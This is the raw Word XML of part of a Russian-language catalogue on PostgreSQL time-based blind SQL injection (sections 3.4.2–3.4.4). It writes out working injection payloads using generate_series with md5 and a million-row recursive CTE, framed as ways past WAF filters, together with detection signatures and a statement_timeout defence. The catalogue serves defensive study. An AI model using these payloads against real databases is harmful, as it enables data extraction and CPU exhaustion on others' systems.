        <w:t xml:space="preserve">3.4.2 Амплификация через `generate_series`</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WAF, блокирующий слово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не блокирует CPU-heavy конструкции, дающие сравнимую задержку. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> генерирует N строк; если каждую строку прогнать через тяжёлое выражение (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5(random())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), backend будет работать N × (время на строку) секунд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что 3.4.1.</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Амплификация через MD5-расчёт по миллиону строк:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM generate_series(1, 1000000) AS g(i) WHERE md5(i::text) IS NOT NULL) ELSE 1 END)</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CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM generate_series(1, 1000000) AS g(i) WHERE md5(i::text) IS NOT NULL) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На типичном PG-сервере миллион </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5(i::text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> занимает 1–3 секунды.</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Канал работает аналогично 3.4.1, но без слова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payload. Обходит WAF-фильтры, заточенные на blacklist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WAITFOR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BENCHMARK</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 функция в PG, генерирующая множество строк. Доступна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по умолчанию. Каждая итерация выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что даёт стабильную CPU-нагрузку. Отличие от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не нагружает CPU (backend ждёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WaitLatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series + md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нагружает одно ядро на 100%.</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md5</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Калибровка количества строк под целевой сервер.</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 повседневная функция, используется для построения таблиц дат, pivot-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с N ≥ 100000 от application-роли. Бизнес-логика обычно работает с диапазонами дат.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">count(*) FROM generate_series(...) WHERE md5(...) IS NOT NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конструкция, не имеющая смысла за пределами амплификации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Latency-сигнатуры аналогичны 3.4.1, плюс — побочный сигнал CPU-spike в моменты длинных ответов.</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3.4.1, 3.4.3, 3.4.4.</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HackTricks: PostgreSQL injection — Time based; PortSwigger SQL injection cheat sheet; PostgreSQL Documentation: Set Returning Functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.3 Рекурсивный CTE как нагрузочный канал</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RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строит результат итеративно. Дочитываемая до миллионов итераций рекурсия даёт ту же CPU-нагрузку, что и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но с другой формой payload — обходит более узкие фильтры.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что 3.4.1.</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Подставляется вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">product_id</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM (WITH RECURSIVE r(i) AS (SELECT 1 UNION ALL SELECT i+1 FROM r WHERE i &lt; 1000000) SELECT i FROM r) s) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="8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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, name, price FROM products WHERE id = (SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM (WITH RECURSIVE r(i) AS (SELECT 1 UNION ALL SELECT i+1 FROM r WHERE i &lt; 1000000) SELECT i FROM r) s) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рекурсия из 1 000 000 итераций даёт задержку 1–3 секунды.</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То же, что 3.4.1 и 3.4.2 — бинарный oracle по latency.</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PG-реализация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> хранит рабочий набор в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tuplestore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и итерирует, добавляя строки. Без ограничения на размер промежуточного результата каждая итерация добавляет строку. Это документированное поведение, не баг. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступен любому пользователю, способному выполнять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Любая версия PG (рекурсивные CTE — с 8.4).</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Рекурсивные CTE применяются для обхода деревьев, графов, генерации последовательностей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с условием остановки на большом числе (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">i &lt; 1000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Легитимные рекурсии останавливаются на десятках уровней, не миллионах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> появляется в инъекционной точке, где раньше его не было.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Общие latency-сигнатуры — как в 3.4.1.</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поддерживаемые версии PG.</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3.4.1, 3.4.2, 3.4.4, 3.10.2.</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HackTricks: PostgreSQL injection — Time based; PortSwigger SQL injection cheat sheet; PostgreSQL Documentation: WITH Queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.4 `statement_timeout` как естественная защита</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PG имеет параметр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прерывающий выполнение запроса по истечении заданного времени. Это не специальная защита от time-based, а общий механизм против тяжёлых запросов, но он напрямую ломает все варианты 3.4.1–3.4.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура «уязвимого кода» — это конфигурация сервера, а не SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = 0   # 0 = без ограничения (дефолт)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт) backend выполняет любой запрос. При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = '5s'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой запрос, не уложившийся в 5 секунд, прерывается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: canceling statement due to statement timeout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Эффект на time-based extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующему нужен надёжно различимый delay над baseline. При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = '5s'</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — успешно отрабатывает, oracle работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — прерывается на 5-й секунде, latency всегда ~5 секунд, oracle ломается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = '1s'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — прерывается на 1-й секунде, oracle ломается.</w:t>
      </w:r>
